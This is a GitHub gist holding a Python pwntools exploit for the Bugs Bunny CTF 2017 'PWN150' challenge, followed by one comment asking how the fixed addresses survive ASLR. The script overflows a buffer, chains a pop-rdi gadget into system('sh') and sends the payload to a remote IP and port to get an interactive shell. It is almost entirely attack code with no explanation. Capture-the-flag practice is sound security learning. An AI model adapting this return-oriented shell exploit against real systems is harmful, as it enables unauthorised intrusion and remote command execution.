Skip to content

Instantly share code, notes, and snippets.

@0xPwny
Created July 31, 2017 11:18
Show Gist options
  • Save 0xPwny/14472496f1b953b597fdc9ad0883843a to your computer and use it in GitHub Desktop.
Save 0xPwny/14472496f1b953b597fdc9ad0883843a to your computer and use it in GitHub Desktop.
Bugs Bunny CTF 2017 - PWN150
#!/usr/bin/python
#Bugs_Bunny CTF 2017
from pwn import *
#r = process("./pwn150")
#raw_input()
r =remote("54.153.19.139",5253)
sh = 0x4003ef
system = 0x4005e0
poprdi = 0x400883
Buff= "AAAAZZZZEEEERRRRTTTTYYYYUUUUIIIIOOOOPPPPQQQQSSSSDDDDFFFFGGGGHHHHJJJJKKKKLLLLMMMMWWWWVVVV"
Buff += p64(poprdi)+p64(sh)+p64(system)
r.sendline(Buff)
r.interactive()
@H4niz
Copy link

H4niz commented Aug 30, 2017

How about ASLR if you get static sh and system addresses?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment